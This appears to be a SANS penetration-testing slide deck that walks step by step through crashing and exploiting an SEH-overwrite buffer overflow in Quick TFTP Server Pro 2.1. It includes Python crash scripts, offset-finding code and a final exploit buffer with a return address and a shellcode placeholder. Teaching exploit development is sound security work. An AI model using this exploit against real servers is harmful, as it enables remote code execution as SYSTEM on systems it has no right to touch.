Advanced Penetration Testing - 2009 SANS 1
Custom Penetration Testing
Compromising a Vulnerability through Discovery and Custom Exploitation
Stephen Sims
Objectives
• Penetration Testing
• Precompiled Tools
• Targeting
• TFTP
  – Testing a TFTP Server for Bugs
  – Discovering the Bug
  – Exploiting the TFTP Server
• Advanced Concepts
What is Penetration Testing?
• Process of testing a target environment for weaknesses
  – More thorough than vulnerability scanning alone
  – Validates findings by exploiting flaws
  – Allows you to think like an attacker
  – Various levels of interaction/depth
Types of Penetration Testing
• Black-Box Penetration Testing
  – No access to source code
  – No access provided to OS, architecture, etc.
  – More like an outsider attack scenario
  – More time consuming
• Crystal-Box (White-Box) Penetration Testing
  – Tester given source code, system & network architecture and/or privileged system access
  – More thorough than black-box testing
  – Cost effective
Precompiled Tools
• Pros
  – Can quickly be used
  – Customer support
  – Broad user community
  – Often allow custom scripts or modules
• Cons
  – Limited in scope
  – Only discover and test known vulnerabilities
  – Skilled attackers are not relying solely on them
  – Precompiled tools invite complacency: a clean scan is not a clean target
  – Do not perform code coverage or deep fuzzing
Targeting
• General Steps
  1. Determine Target Application and Operating System
  2. Obtain a Copy of the Application
  3. Analyze RFC and Communications Protocols
  4. Discover and Record a Crash Condition
  5. Analyze Crash Condition for Exploitation Opportunities
1) Determine Target Application and Operating System
• What application/service are you analyzing?
  – What OSes is it available for?
    • Which one(s) are you interested in?
  – What services does the application start up?
    • There may be several
    • Scanning may help
    • Analyze documentation and code if possible
  – Are the services proprietary or standards-based?
    • Proprietary protocols often offer a lot of new opportunities, since they have had far less outside scrutiny
2) Obtain a Copy of the Application
• Create a lab environment and install the application
  – Use the OS you are targeting
  – Utilize Virtual Machines
    • Create snapshots prior to installation
    • Install monitoring tools
  – Attempt to obtain the source code
    • Code analysis is often more complex than behavioral analysis, but valuable
3) Analyze RFC and Communications Protocols
• Is documentation available?
  – Programmers should follow RFCs
    • Search the RFC for options and fields that may offer opportunities to cause a fault (variable-length strings, length fields, optional extensions)
    • Understand each aspect of the protocols used by the application and the behavior that goes with it
  – Is architectural documentation available?
4) Discover and Record a Crash Condition
• Are you properly monitoring?
  – Sniffers to record packets sent to the application
    • Wireshark/Tshark, tcpdump, etc.
    • Packets can be recorded and replayed
  – Debuggers to record application behavior while receiving/handling data
    • OllyDbg, Immunity Debugger, WinDbg
  – OS monitoring tools to monitor health
    • ProcMon, RegMon, FileMon, RegShot, etc.
  – The condition must be repeatable
5) Analyze Crash Condition for Exploitation Opportunities
• What is happening during the crash?
  – Analyze the status of each register
    • Are registers holding or pointing to strange values? e.g. 0x41414141 if inputting A's
  – Is the return pointer or SEH chain being overwritten?
    • Analyze the stack segment and monitor ESP/EBP
  – Are heap pointers being overwritten?
    • Analyze dynamic memory allocations and behavior
  – There's way more to analyze, but this is a start!
Targeting (2)
• Our goal is to discover and exploit a Windows program vulnerability!
• The techniques we'll cover are applicable to any target or service
• We're targeting a TFTP service
  – Must understand how the protocol works
  – Developers should follow RFCs
    • We can leverage the RFC as well
  – Could use fuzzing to automate bug discovery
Our TFTP Target
• Quick TFTP Server Pro Version 2.1
  – Vulnerable to a stack-based buffer overflow
    • Can be exploited by overwriting the Structured Exception Handling (SEH) chain
    • Allows for DoS or code execution as SYSTEM
  – TFTP Server published by TallSoft
  – Vulnerability discovered in 2008 by Mati Aharoni of Offensive Security
TFTP
• Trivial File Transfer Protocol (TFTP)
  – Simple protocol for transferring files over a network (RFC 1350)
  – Clear-text protocol over UDP; the server listens on port 69; no authentication
  – Used for transferring files by network devices, VoIP phones and other client-server programs
TFTP Behavior
• Connection request is combined with either a read or write request
  – The server replies from a freshly chosen UDP port (its transfer identifier), not from port 69; a client or test script must accept the reply from that port
• Blocks of data are sent in a fixed 512 byte size
  – Each block must be acknowledged for error control
  – A block of less than 512 bytes indicates the end of the stream
TFTP Behavior (2)
• The first two bytes of a TFTP header (the opcode) indicate the packet type and format
  – \x00\x01 indicates a read request (RRQ)
  – \x00\x02 indicates a write request (WRQ)
  – \x00\x03 indicates a data block (DATA)
  – \x00\x04 is an acknowledgement (ACK)
  – \x00\x05 indicates an error (ERROR)
  – \x00\x06 is an option acknowledgement (OACK, added by RFC 2347)
TFTP Behavior (3)
• Read and Write request format:
  – \x00\x01 for read | \x00\x02 for write
  – File Name
  – Null byte - \x00
  – Mode – "netascii" (ASCII), "octet" (binary) or "mail"; matched case-insensitively
  – Null byte - \x00
• Example

  Request Type | Opcode   | File Name | Null | Mode  | Null
  Read         | \x00\x01 | file1.txt | \x00 | octet | \x00
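The request format above, as an added example in Python (not code from the slides): an encoder for RRQ/WRQ and a parser for every RFC 1350 packet type plus OACK. The malformed-input checks in parse_packet are the mirror image of what a fuzzer exercises: a request with a missing NUL terminator or an unknown mode is what a correct server must reject, and the oversized mode field used later in this deck is exactly such an input. Only the standard library is used; the sample packets are constructed.

```python
import struct

# Opcodes from RFC 1350 (OACK from RFC 2347)
RRQ, WRQ, DATA, ACK, ERROR, OACK = 1, 2, 3, 4, 5, 6
MODES = (b"netascii", b"octet", b"mail")


def build_request(opcode, filename, mode=b"octet"):
    """Encode an RRQ/WRQ: 2-byte opcode | filename | NUL | mode | NUL."""
    if opcode not in (RRQ, WRQ):
        raise ValueError("build_request only encodes RRQ/WRQ")
    if isinstance(filename, str):
        filename = filename.encode("ascii")
    if isinstance(mode, str):
        mode = mode.encode("ascii")
    return struct.pack("!H", opcode) + filename + b"\x00" + mode + b"\x00"


def build_data(block, payload):
    return struct.pack("!HH", DATA, block) + payload


def build_ack(block):
    return struct.pack("!HH", ACK, block)


def build_error(code, message):
    return struct.pack("!HH", ERROR, code) + message.encode("ascii") + b"\x00"


def parse_packet(pkt):
    """Decode any TFTP packet into a dict; raise ValueError on malformed input.
    A server that skips these checks (no terminator, unknown mode, short
    packet) is the one whose parser a fuzzer will find."""
    if len(pkt) < 2:
        raise ValueError("packet shorter than opcode")
    (op,) = struct.unpack("!H", pkt[:2])
    body = pkt[2:]
    if op in (RRQ, WRQ):
        # Two NUL-terminated strings; the split leaves an empty tail after the last NUL.
        fields = body.split(b"\x00")
        if len(fields) < 3:
            raise ValueError("request missing NUL terminator")
        filename, mode = fields[0], fields[1].lower()
        if mode not in MODES:
            raise ValueError("unknown transfer mode %r" % mode)
        return {"op": op, "filename": filename, "mode": mode.decode("ascii")}
    if op == DATA:
        if len(body) < 2:
            raise ValueError("DATA missing block number")
        (block,) = struct.unpack("!H", body[:2])
        # A data block shorter than 512 bytes is the last block of the transfer.
        return {"op": op, "block": block, "data": body[2:], "last": len(body) - 2 < 512}
    if op == ACK:
        if len(body) != 2:
            raise ValueError("bad ACK length")
        return {"op": op, "block": struct.unpack("!H", body)[0]}
    if op == ERROR:
        if len(body) < 3 or body[-1:] != b"\x00":
            raise ValueError("bad ERROR packet")
        code = struct.unpack("!H", body[:2])[0]
        return {"op": op, "code": code, "message": body[2:-1].decode("ascii", "replace")}
    if op == OACK:
        parts = body.split(b"\x00")[:-1]  # option/value pairs, each NUL-terminated
        return {"op": op, "options": dict(zip(parts[0::2], parts[1::2]))}
    raise ValueError("unknown opcode %d" % op)
```

parse_packet is the piece to keep when writing the test harness: once a crash is found, replaying captured packets through it tells you immediately which field the server should have rejected.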
Hacking Quick TFTP Server
• Quick TFTP Server Version 2.1
  – Install tftpserver_setup.exe onto a Windows XP Virtual Machine
  – Use the TFTP information just covered to help with the investigation
  – Attempt to crash the TFTP server while running in a debugger
  – Create a custom script to start the testing
  – Validate findings
  – Attempt code execution
Tools We Need
• Programming/Scripting Language
  – Python, Perl, Ruby, C
• Debugger and Disassembler
  – OllyDbg, Immunity Debugger, IDA Pro
• Shellcode
  – Metasploit, Milw0rm, Custom
• An open mind!
  – Knowledge of OS controls, opcodes, tricks…
Python
• Object-oriented, high-level programming language
• Very intuitive
• Very modular
• No manual compilation
• Plays well with other languages – C, C++, Jython (JVM), IronPython (.NET)
• Good debugging
Tool: OllyDbg
• Software debugger for Windows
  – Author: Oleh Yuschuk
  – Shareware!
  – Binary code analysis
  – Register contents, procedures, API calls, patching, memory searching and more!
Hacking TFTP Hint #1
• Consider the format of TFTP requests for your script
  – We covered the order a few slides ago
  – Read & write requests are often the easiest to attack as they have variable-length fields
    • They start with \x00\x01 & \x00\x02
  – The header format must be correct to trigger a valid response; a malformed header is usually dropped before the vulnerable parsing code is ever reached
  – Command-line scripting is not always the best option
    • You may want to write a script
Hacking TFTP Hint #2
• Where could a buffer overflow condition exist?
  – Try the request type field, the file name and/or the mode
  – Don't forget the nulls to terminate!
  – Make sure you're watching the right thread in OllyDbg
    • Processes have multiple threads on Windows
Hacking TFTP Hint #3
• The easiest way is to use Python or Perl to open a socket and send your packet

    import socket
    import sys

    target = 'IP ADDRESS'      # Enter the right IP here
    port = 69                  # Port for TFTP
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    cmd = b"A"*10              # Enter the number of A's to send
    data = b"\x00\x01" + cmd   # Modify this line to format your packet (filename, NUL, mode, NUL)
    s.sendto(data, (target, port))

  – The b"" prefixes keep the literals as raw bytes on both Python 2.6+ and Python 3; without them the script breaks on Python 3, where str and bytes differ
Quick TFTP Walk-Through
• Start Quick TFTP Server with Olly
• Ignore entry point messages
• Press F9 once loaded
• Click “OK” on the demo pop-up
Quick TFTP Walk-Through (2)
• This may be possible via command line, but…
  – We need a script!
  – Don't forget the formatting of TFTP read and write requests:

    Request Type | Opcode   | File Name | Null | Mode  | Null
    Read         | \x00\x01 | file1.txt | \x00 | octet | \x00

  – The overflow is in the mode section!
Quick TFTP Walk-Through (3)
• Write a Python script that sends a read request to the TFTP server with 1000 A's in the mode field
• No crash in Olly…
Quick TFTP Walk-Through (4)
• 1060 A's in the mode field
• Olly has paused on the access violation
  – With an SEH overwrite the first pause is the original fault; pass the exception to the program (Shift+F9) and the overwritten handler is called
• EIP is 41414141
• Success!
Quick TFTP Walk-Through (5)
• What are we overwriting?
• Let's do some math to see where the overflow is occurring
  – Check View > SEH chain in Olly: the handler address reads 41414141
• We overwrote the SEH chain!
Quick TFTP Walk-Through (6)
• Subtracting 41 A's (1060 - 41 = 1019) should take us to the start of the SEH record: the next-SEH pointer sits at offset 1019 and the handler pointer 4 bytes later at offset 1023
• Let's give it a try by setting:

    cmd = "A"*1023 + "\xde\xc0\xad\xde"

• We control EIP at 1023 bytes! EIP reads 0xdeadc0de, the four bytes written little-endian into the handler pointer
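The subtraction above works because every byte sent was "A". The added example below (Python, not from the slides) shows the general technique of which that is one instance: a cyclic pattern in which every 4-byte window is unique within its 20280-byte period, so the value displayed in EIP or in the SEH chain maps straight to an offset in the mode field without a second guess-and-check run. The "observed" register values are constructed by reading them back out of the pattern, standing in for what OllyDbg would display; the file name in the probe request is an assumption.

```python
import string
import struct


def cyclic_pattern(length):
    """Metasploit-style pattern Aa0Aa1...: upper, lower, digit triples counted
    through 26*26*10 combinations (20280 bytes), within which no 4-byte window
    repeats, so any DWORD seen in a register identifies exactly one offset."""
    out = bytearray()
    for a in string.ascii_uppercase:
        for b in string.ascii_lowercase:
            for c in string.digits:
                out += (a + b + c).encode("ascii")
                if len(out) >= length:
                    return bytes(out[:length])
    raise ValueError("length exceeds the pattern's unique range")


def as_register_value(chunk):
    """Little-endian DWORD as the debugger shows it, e.g. b'AAAA' -> 0x41414141."""
    return struct.unpack("<I", chunk[:4])[0]


def pattern_offset(pattern, value):
    """Offset of the 4 bytes that produced `value` (an int from EIP/SEH, or raw bytes)."""
    if isinstance(value, int):
        value = struct.pack("<I", value)
    idx = pattern.find(value)
    if idx < 0:
        raise ValueError("value not found in pattern")
    if pattern.find(value, idx + 1) >= 0:
        raise ValueError("value occurs more than once; use a longer unique pattern")
    return idx


def seh_offsets(pattern, handler_value):
    """Given the value overwriting the SEH handler, return (nseh_offset, handler_offset).
    The record is [next-SEH pointer][handler pointer], so next-SEH is 4 bytes earlier."""
    handler_offset = pattern_offset(pattern, handler_value)
    if handler_offset < 4:
        raise ValueError("handler offset too small for a preceding next-SEH field")
    return handler_offset - 4, handler_offset


def probe_request(pattern, filename=b"blah"):
    """The read request to send: the pattern takes the place of the mode field."""
    return b"\x00\x01" + filename + b"\x00" + pattern + b"\x00"


if __name__ == "__main__":
    import socket
    import sys
    pat = cyclic_pattern(1060)
    socket.socket(socket.AF_INET, socket.SOCK_DGRAM).sendto(probe_request(pat), (sys.argv[1], 69))
    # Then: seh_offsets(pat, 0x...) with the handler value OllyDbg shows in the SEH chain
```

One run with the pattern replaces the 1000/1060/1023 iterations; the same pattern_offset call resolves a value found in any register, not only EIP.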
Quick TFTP Walk-Through (7)
• We now need to find a valid pop/pop/ret instruction
  – Use the findjmp tool and experiment
  – 0x77ec9cac is one I chose from kernel32.dll for XP SP1
    • System DLL addresses differ between service packs, patch levels and language versions; re-find the address on the exact build you are targeting
  – Remember that you must compensate for SafeSEH if hacking XP SP2/SP3: the handler address has to come from a module that was not linked with /SafeSEH
  – Also remember that not every pop/pop/ret address will work. You gotta dig…
Quick TFTP Walk-Through (8)
• Finalizing our script…

    cmd = "A"*1019 + "\xeb\x06\x90\x90" + "\xac\x9c\xec\x77" + "\x90"*4 + sc
    data = "\x00\x01" + "blah" + "\x00" + cmd + "\x00"

  – Our jmp and pointer: "\xeb\x06\x90\x90" fills the next-SEH field with a short jump (JMP +6) that hops over the 4-byte handler pointer; "\xac\x9c\xec\x77" is 0x77ec9cac, the pop/pop/ret address, written little-endian into the handler pointer
  – Our NOPs and shellcode: the jump lands on the four NOPs, which run into sc, the shellcode
Advanced Concepts
• Depending on the OS version, a number of controls have been added
  – SafeSEH
    • Protects SEH pointers against overwrites: a handler is only called if it appears in its module's registered handler table, so the pop/pop/ret address must come from a module without one
  – ASLR
    • Randomizes locations of libraries and memory segments (Vista and later)
  – DEP
    • Marks the stack and heap non-executable, preventing code execution there
  – Security Cookies
    • Places unique values on the stack (/GS, checked on function return) and in heap chunk headers (checked on free); an overwrite that reaches them is detected before the corrupted pointer is used
• Every byte in memory is a potential full or partial opcode
  – As long as the segment is executable
More Information
• Defeating the Stack Based Buffer Overflow Prevention Mechanism of Microsoft Windows 2003 Server, David Litchfield: http://www.nextgenss.com/papers/defeating-w2k3-stack-protection.pdf (also http://www.ngssoftware.com/papers/defeating-w2k3-stack-protection.pdf)
• Preventing the Exploitation of SEH Overwrites, Skape (Matt Miller): http://www.uninformed.org/?v=5&a=2&t=pdf
• SEH Overwrites Simplified v1.01, Aelphaeis Mangarae: http://www.milw0rm.com/papers/187
• Defeating Microsoft Windows XP SP2 Heap protection and DEP bypass, Alexander Anisimov: http://www.maxpatrol.com/defeating-xpsp2-heap-protection.pdf
• Reliable Windows Heap Exploits, Matt Conover & Oded Horovitz: http://www.slideshare.net/amiable_indian/reliable-windows-heap-exploits
• Third Generation Exploitation, Halvar Flake: http://www.blackhat.com/presentations/win-usa-02/halvarflake-winsec02.ppt
• Heap Feng Shui in JavaScript, Alexander Sotirov: http://www.blackhat.com/presentations/bh-europe-07/Sotirov/Presentation/bh-eu-07-sotirov-apr19.pdf
• Understanding Windows Shellcode, Skape: http://www.hick.org/code/skape/papers/win32-shellcode.pdf
End
• Questions?
• SANS SEC709 "Developing Exploits for Penetration Testers and Security Researchers"